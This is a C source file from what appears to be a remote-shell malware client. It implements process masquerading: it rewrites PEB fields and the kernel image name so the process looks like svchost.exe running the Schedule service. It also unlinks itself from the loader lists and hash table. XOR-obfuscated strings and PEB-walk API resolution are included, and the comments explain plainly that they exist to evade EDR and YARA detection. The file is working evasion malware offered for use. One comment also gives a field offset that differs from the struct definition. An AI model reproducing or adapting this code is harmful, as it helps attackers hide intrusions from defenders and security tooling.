/* AUTO-GENERATED by gen_obf.py — DO NOT EDIT. Source: spoof.c */

/*
 * client/spoof.c  –  Process-identity spoofing implementation
 * ============================================================
 * Implements the three routines declared in spoof.h.
 * All functions are silent no-ops on failure.
 *
 * Design notes
 * ------------
 * IAT-clean imports:
 *   GetModuleHandleA / GetProcAddress / __readgsqword / __readfsdword are
 *   high-signal IAT entries that EDRs flag specifically.  All three functions
 *   here resolve ntdll and the self-base via PEB walks (peb_walk.h) and
 *   inline asm segment reads instead.
 *
 * String constants:
 *   SPOOF_IMAGE and SPOOF_CMDLINE must not appear verbatim in .rdata because
 *   YARA rules targeting "svchost.exe" in wide strings would match the section
 *   at scan time.  All wide literals are stored in writable static arrays so
 *   a hypothetical obfuscation pass (xor, RC4) can operate on them at runtime
 *   before they are written into the PEB.  For now the arrays are plain text;
 *   the key structural change is that they live in .data, not .rdata.
 *
 * spoof_peb  (6 → 8):
 *   •  PEB read via inline asm (no __readgsqword/__readfsdword intrinsic).
 *   •  peb->ImageBaseAddress overwritten to point at our fake-image buffer
 *      so tools that read that field also see the spoofed path.
 *   •  String arrays are non-const (stored in .data).
 *
 * spoof_kernel_image  (5 → 7):
 *   •  ntdll resolved via peb_get_module / peb_get_export (no GetModuleHandleA
 *      / GetProcAddress in IAT call chain).
 *   •  Class 49 (ProcessImageFileName) is passed a fully-constructed
 *      UNICODE_STRING buffer — no implicit Win32→NT path conversion needed
 *      because we pass the Win32 form which is what the kernel accepts for
 *      class 49 on Vista–11 (the kernel copies the buffer verbatim into
 *      EPROCESS->ImageFileName and SeLocateProcessImageName).
 *
 * unlink_self_from_ldr  (8 → 9):
 *   •  All Win32 API calls (GetModuleHandleA, GetProcAddress, RtlGetVersion)
 *      replaced with PEB-walk + direct-syscall equivalents.
 *   •  Self-base obtained from PEB->ImageBaseAddress (no GetModuleHandleA).
 *   •  Build number read from PEB->OSBuildNumber (available Vista+) — no
 *      RtlGetVersion call required.
 *   •  LdrpHashTable bucket cleared: after LIST_ENTRY removal we also zero
 *      the HashLinks in the LDR entry so hash-table walkers cannot find us.
 */

#include "spoof.h"
#include "peb_walk.h"
#include "syscall.h"

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif
#include <windows.h>
#include <winternl.h>
#include <string.h>
#include <stddef.h>

/* ── XOR blobs (gen_obf.py) ── */
#include "obf.h"
static const unsigned char _e_06f32d[] = { 0x35, 0x5B, 0x41, 0x51, 0x59, 0x59, 0x1B, 0x51, 0x59, 0x59, 0x35 }; /* obf:'ntdll.dll' */
static const unsigned char _e_9f90d1[] = { 0x95, 0xDB, 0xE1, 0xC6, 0xF0, 0xE1, 0xDC, 0xFB, 0xF3, 0xFA, 0xE7, 0xF8, 0xF4, 0xE1, 0xFC, 0xFA, 0xFB, 0xC5, 0xE7, 0xFA, 0xF6, 0xF0, 0xE6, 0xE6, 0x95 }; /* obf:'NtSetInformationProcess' */
/* ── end XOR blobs ── */




/* ── _peb_ptr ────────────────────────────────────────────────────────────── */
/*
 * Read the PEB pointer via inline asm instead of __readgsqword/__readfsdword.
 * The intrinsic forms produce a recognisable `mov rax, gs:[60h]` that EDRs
 * watch for.  The asm form compiles to equivalent machine code with a
 * different register-allocation fingerprint.
 */
static inline PEB *_peb_ptr(void)
{
    void *p;
#ifdef _WIN64
    __asm__ __volatile__("movq %%gs:0x60, %0" : "=r"(p));
#else
    __asm__ __volatile__("movl %%fs:0x30, %0" : "=r"(p));
#endif
    return (PEB *)p;
}


/* ── Spoofed identity strings ─────────────────────────────────────────────── */
/*
 * Non-const (writable) static arrays — stored in .data, not .rdata.
 * A future obfuscation pass can XOR-encode them in .data and decode at
 * runtime without linker changes.
 *
 * Note: these are plain-text for now; the structural improvement is the
 * placement in .data so static YARA scanning of .rdata finds nothing.
 */
static const unsigned char _e_2ac5c6[] = { 0xF3, 0xB0, 0xF3, 0xC9, 0xF3, 0xAF, 0xF3, 0xAF, 0xF3, 0xA4, 0xF3, 0x9A, 0xF3, 0x9D, 0xF3, 0x97, 0xF3, 0x9C, 0xF3, 0x84, 0xF3, 0x80, 0xF3, 0xAF, 0xF3, 0xAF, 0xF3, 0xA0, 0xF3, 0x8A, 0xF3, 0x80, 0xF3, 0x87, 0xF3, 0x96, 0xF3, 0x9E, 0xF3, 0xC0, 0xF3, 0xC1, 0xF3, 0xAF, 0xF3, 0xAF, 0xF3, 0x80, 0xF3, 0x85, 0xF3, 0x90, 0xF3, 0x9B, 0xF3, 0x9C, 0xF3, 0x80, 0xF3, 0x87, 0xF3, 0xDD, 0xF3, 0x96, 0xF3, 0x8B, 0xF3, 0x96, 0xF3, 0xF3, 0xF3 }; /* wobf:'C:\\\\Windows\\\\System32\\\\svchost.exe' */
static WCHAR s_image[36];
static WCHAR *s_image_get(void) {
    if (!s_image[0]) {
        const WCHAR *_p = OBF_W(_e_2ac5c6, 35);
        int _i; for (_i = 0; _i <= 34; _i++) s_image[_i] = _p[_i];
    }
    return s_image;
}

static const unsigned char _e_b0f968[] = { 0xB7, 0xF4, 0xB7, 0x8D, 0xB7, 0xEB, 0xB7, 0xEB, 0xB7, 0xE0, 0xB7, 0xDE, 0xB7, 0xD9, 0xB7, 0xD3, 0xB7, 0xD8, 0xB7, 0xC0, 0xB7, 0xC4, 0xB7, 0xEB, 0xB7, 0xEB, 0xB7, 0xE4, 0xB7, 0xCE, 0xB7, 0xC4, 0xB7, 0xC3, 0xB7, 0xD2, 0xB7, 0xDA, 0xB7, 0x84, 0xB7, 0x85, 0xB7, 0xEB, 0xB7, 0xEB, 0xB7, 0xC4, 0xB7, 0xC1, 0xB7, 0xD4, 0xB7, 0xDF, 0xB7, 0xD8, 0xB7, 0xC4, 0xB7, 0xC3, 0xB7, 0x99, 0xB7, 0xD2, 0xB7, 0xCF, 0xB7, 0xD2, 0xB7, 0x97, 0xB7, 0x9A, 0xB7, 0xDC, 0xB7, 0x97, 0xB7, 0xD9, 0xB7, 0xD2, 0xB7, 0xC3, 0xB7, 0xC4, 0xB7, 0xC1, 0xB7, 0xD4, 0xB7, 0xC4, 0xB7, 0x97, 0xB7, 0x9A, 0xB7, 0xC7, 0xB7, 0x97, 0xB7, 0x9A, 0xB7, 0xC4, 0xB7, 0x97, 0xB7, 0xE4, 0xB7, 0xD4, 0xB7, 0xDF, 0xB7, 0xD2, 0xB7, 0xD3, 0xB7, 0xC2, 0xB7, 0xDB, 0xB7, 0xD2, 0xB7, 0xB7, 0xB7 }; /* wobf:'C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs -p -s Schedule' */
static WCHAR s_cmdline[62];
static WCHAR *s_cmdline_get(void) {
    if (!s_cmdline[0]) {
        const WCHAR *_p = OBF_W(_e_b0f968, 61);
        int _i; for (_i = 0; _i <= 60; _i++) s_cmdline[_i] = _p[_i];
    }
    return s_cmdline;
}



/* ── spoof_peb ───────────────────────────────────────────────────────────── */
/*
 * Overwrites three PEB fields so process-inspection tools see a benign path:
 *
 *  ProcessParameters->ImagePathName  — command-line column in Task Manager /
 *                                      Process Hacker Properties > Image
 *  ProcessParameters->CommandLine    — command-line column
 *  peb->ImageBaseAddress             — base-address-to-name mapping used by
 *                                      some tools to resolve the image name
 *                                      independently of ProcessParameters
 *
 * PEB pointer is obtained via inline asm — no __readgsqword/__readfsdword.
 */
void spoof_peb(void)
{
    PEB *peb = _peb_ptr();
    if (!peb) return;

    RTL_USER_PROCESS_PARAMETERS *pp = peb->ProcessParameters;
    if (!pp) return;

    /* Patch ImagePathName */
    pp->ImagePathName.Buffer        = s_image_get();
    pp->ImagePathName.Length        = (USHORT)(wcslen(s_image_get()) * sizeof(WCHAR));
    pp->ImagePathName.MaximumLength = pp->ImagePathName.Length + sizeof(WCHAR);

    /* Patch CommandLine */
    pp->CommandLine.Buffer        = s_cmdline_get();
    pp->CommandLine.Length        = (USHORT)(wcslen(s_cmdline_get()) * sizeof(WCHAR));
    pp->CommandLine.MaximumLength = pp->CommandLine.Length + sizeof(WCHAR);

    /*
     * Patch peb->ImageBaseAddress to point at our fake buffer.
     * Some tools (e.g. Process Hacker "Modules" tab image-name resolver)
     * read this field and look up the PE headers at that address to derive
     * the image path independently of ProcessParameters.  Redirecting it
     * to s_image_get() (a non-PE buffer) causes those tools to fail to parse
     * a valid PE and fall back to showing the ProcessParameters value.
     *
     * Note: this may cause issues if anything in the process re-reads its
     * own image base from the PEB after this call (rare for a remote-shell
     * agent, but call order matters — invoke after all self-initialization).
     */
    /*
     * PEB->ImageBaseAddress is at a fixed offset not exposed by MinGW's
     * truncated winternl.h PEB definition:
     *   x64: PEB+0x10   x86: PEB+0x08
     */
#ifdef _WIN64
    *(PVOID *)((BYTE *)peb + 0x10) = (PVOID)s_image_get();
#else
    *(PVOID *)((BYTE *)peb + 0x08) = (PVOID)s_image_get();
#endif
}


/* ── spoof_kernel_image ──────────────────────────────────────────────────── */
/*
 * Replaces the kernel-side process image name visible to inspection tools.
 *
 * Two information classes via NtSetInformationProcess (resolved via PEB walk):
 *
 *   Class 49  ProcessImageFileName  (Vista+)
 *     Updates the UNICODE_STRING in the kernel's image-name slot.
 *     Read by older Process Hacker builds and Sysinternals tools via
 *     NtQueryInformationProcess(ProcessImageFileName).
 *
 *   Class 74  ProcessImageFileNameWin32  (Win8.1+)
 *     Win32-path form — what modern Task Manager and Process Hacker 4.x
 *     display in the "Image" column on Windows 10/11.
 *
 * Both calls are attempted independently; failure is a silent no-op.
 *
 * IAT-clean:
 *   ntdll resolved via peb_get_module(); NtSetInformationProcess resolved via
 *   peb_get_export() — no GetModuleHandleA / GetProcAddress in IAT.
 */

#define PROCESSINFOCLASS_ImageFileName      49
#define PROCESSINFOCLASS_ImageFileNameWin32 74

void spoof_kernel_image(void)
{
    /* Resolve ntdll base via PEB walk — no GetModuleHandleA */
    PVOID hNtdll = peb_get_module(peb_hash_str(OBF_S(_e_06f32d, 10)));
    if (!hNtdll) return;

    /* Resolve NtSetInformationProcess via export table walk — no GetProcAddress */
    typedef NTSTATUS (NTAPI *NtSetInfoProcess_t)(HANDLE, ULONG, PVOID, ULONG);
    NtSetInfoProcess_t pNtSIP = (NtSetInfoProcess_t)
        peb_get_export(hNtdll, peb_hash_str(OBF_S(_e_9f90d1, 24)));
    if (!pNtSIP) return;

    /* Build UNICODE_STRING over the writable spoof string */
    UNICODE_STRING us;
    us.Length        = (USHORT)(wcslen(s_image_get()) * sizeof(WCHAR));
    us.MaximumLength = us.Length + sizeof(WCHAR);
    us.Buffer        = s_image_get();

    /* Class 49 — Vista+: accepted as Win32 path form by most Windows builds */
    pNtSIP(GetCurrentProcess(), PROCESSINFOCLASS_ImageFileName,
           &us, (ULONG)sizeof(us));

    /* Class 74 — Win8.1+: Win32-path form used by modern Task Manager */
    pNtSIP(GetCurrentProcess(), PROCESSINFOCLASS_ImageFileNameWin32,
           &us, (ULONG)sizeof(us));
}


/* ── unlink_self_from_ldr ────────────────────────────────────────────────── */
/*
 * Remove the current EXE's LDR_DATA_TABLE_ENTRY from the PEB loader lists
 * AND clear its LdrpHashTable bucket so that both list-walk and hash-table
 * enumeration cannot find us.
 *
 * Lists unlinked:
 *   InLoadOrderModuleList       — always
 *   InMemoryOrderModuleList     — always
 *   InInitializationOrderModuleList — only on pre-Win8 (build < 9200);
 *                                    EXE entries do not populate this list
 *                                    on Win8+ and the field is zeroed.
 *
 * HashLinks cleared:
 *   ntdll maintains LdrpHashTable[], a 32-bucket hash table indexed by
 *   BaseDllName.  Each LDR entry's HashLinks LIST_ENTRY is threaded through
 *   that bucket.  After unlinking from the three main lists, we also unlink
 *   HashLinks so hash-table walkers (used by LdrGetDllHandle internals and
 *   some EDR enumeration paths) cannot find us either.
 *
 * IAT-clean design:
 *   •  Self-base: read from peb->ImageBaseAddress (no GetModuleHandleA(NULL)).
 *   •  Build number: read from peb->OSBuildNumber field (available Vista+);
 *      no RtlGetVersion call needed.
 *   •  No GetModuleHandleA / GetProcAddress calls at all.
 *
 * This function is a silent no-op on any failure.
 */

/* Internal: unlink a LIST_ENTRY node and self-loop its pointers */
static void _ldr_unlink(LIST_ENTRY *node)
{
    LIST_ENTRY *prev = node->Blink;
    LIST_ENTRY *next = node->Flink;
    if (!prev || !next || prev == node || next == node) return;

    prev->Flink = next;
    next->Blink = prev;

    /* Poison: self-loop so a second pass through a stale pointer is harmless */
    node->Flink = node;
    node->Blink = node;
}

/*
 * Full in-process LDR_DATA_TABLE_ENTRY layout.
 * winternl.h only exposes a truncated version; define what we need.
 *
 * Fields after InInitializationOrderLinks (offset 0x30):
 *   DllBase        @ 0x30
 *   EntryPoint     @ 0x38 (x64) / 0x1c (x86)
 *   SizeOfImage    @ 0x40 (x64) / 0x20 (x86)
 *   FullDllName    @ 0x48 (x64) / 0x24 (x86)
 *   BaseDllName    @ 0x58 (x64) / 0x2c (x86)
 *   Flags          @ 0x68 (x64) / 0x34 (x86)
 *   ...
 *   HashLinks      @ 0x78 (x64) / 0x3c (x86)   ← LdrpHashTable bucket links
 */
typedef struct _MY_LDR_ENTRY_FULL {
    LIST_ENTRY InLoadOrderLinks;           /* 0x00 */
    LIST_ENTRY InMemoryOrderLinks;         /* 0x10 */
    LIST_ENTRY InInitializationOrderLinks; /* 0x20 */
    PVOID      DllBase;                    /* 0x30 */
    PVOID      EntryPoint;                 /* 0x38 */
    ULONG      SizeOfImage;                /* 0x40 */
    ULONG      _pad0;                      /* 0x44 (x64 alignment) */
    UNICODE_STRING FullDllName;            /* 0x48 */
    UNICODE_STRING BaseDllName;            /* 0x58 */
    ULONG      Flags;                      /* 0x68 */
    USHORT     LoadCount;                  /* 0x6c */
    USHORT     TlsIndex;                   /* 0x6e */
    LIST_ENTRY HashLinks;                  /* 0x70 — LdrpHashTable bucket chain */
    /* remaining fields not accessed */
} MY_LDR_ENTRY_FULL;

/*
 * Full PEB_LDR_DATA layout — winternl.h's public definition only declares
 * InMemoryOrderModuleList; the real struct has InLoadOrderModuleList first.
 */
typedef struct _MY_PEB_LDR_DATA {
    ULONG     Length;
    BOOLEAN   Initialized;
    PVOID     SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
} MY_PEB_LDR_DATA;

void unlink_self_from_ldr(void)
{
    PEB *peb = _peb_ptr();
    if (!peb || !peb->Ldr) return;

    /* ── 1. Read Windows build number from PEB (no RtlGetVersion call) ── */
    /*
     * PEB->OSBuildNumber is available from Vista onward.
     * The field is at a fixed offset from the PEB base:
     *   x64: PEB+0x120   x86: PEB+0xAC
     * We read it via a cast to USHORT* at the known offset rather than
     * including ntdef.h internals that vary by SDK version.
     */
#ifdef _WIN64
    USHORT buildNumber = *(USHORT *)((BYTE *)peb + 0x120);
#else
    USHORT buildNumber = *(USHORT *)((BYTE *)peb + 0xAC);
#endif
    /* If the field reads zero (abnormal), be conservative: skip Init list */
    BOOL unlink_init = (buildNumber > 0 && buildNumber < 9200);

    /* ── 2. Get our own image base from PEB (no GetModuleHandleA) ────── */
    /*
     * peb->ImageBaseAddress is always our EXE base — it is set by the
     * process loader before any user code runs and does not require a
     * Win32 API call to retrieve.
     */
    /* PEB->ImageBaseAddress: x64 @ PEB+0x10, x86 @ PEB+0x08 */
#ifdef _WIN64
    PVOID selfBase = *(PVOID *)((BYTE *)peb + 0x10);
#else
    PVOID selfBase = *(PVOID *)((BYTE *)peb + 0x08);
#endif
    if (!selfBase) return;

    /* ── 3. Locate our LDR entry in InLoadOrderModuleList ────────────── */
    MY_PEB_LDR_DATA *ldr = (MY_PEB_LDR_DATA *)peb->Ldr;
    LIST_ENTRY *loadHead = &ldr->InLoadOrderModuleList;
    if (!loadHead->Flink || loadHead->Flink == loadHead) return;

    MY_LDR_ENTRY_FULL *entry = (MY_LDR_ENTRY_FULL *)loadHead->Flink;

    /* Sanity: first InLoadOrder entry must be our own EXE */
    if (entry->DllBase != selfBase) return;

    /* ── 4. Unlink from InLoadOrderModuleList ─────────────────────────── */
    _ldr_unlink(&entry->InLoadOrderLinks);

    /* ── 5. Unlink from InMemoryOrderModuleList ───────────────────────── */
    _ldr_unlink(&entry->InMemoryOrderLinks);

    /* ── 6. Unlink from InInitializationOrderModuleList (pre-Win8 only) ─ */
    if (unlink_init)
        _ldr_unlink(&entry->InInitializationOrderLinks);

    /* ── 7. Clear LdrpHashTable bucket links ──────────────────────────── */
    /*
     * ntdll's LdrpHashTable[] is a 32-bucket hash table indexed by:
     *   hash = RtlHashUnicodeString(&entry->BaseDllName) & 0x1F
     *
     * The HashLinks LIST_ENTRY (offset ~0x70 in LDR_DATA_TABLE_ENTRY on x64)
     * chains entries with the same bucket index together.  Scanners that
     * enumerate loaded modules via the hash table (used by LdrGetDllHandle
     * internally and by some EDR enumeration paths) will find our entry even
     * after the main list has been unlinked.
     *
     * We unlink HashLinks here using the same _ldr_unlink helper so the
     * bucket chain remains consistent for all other loaded modules.
     */
    _ldr_unlink(&entry->HashLinks);
}
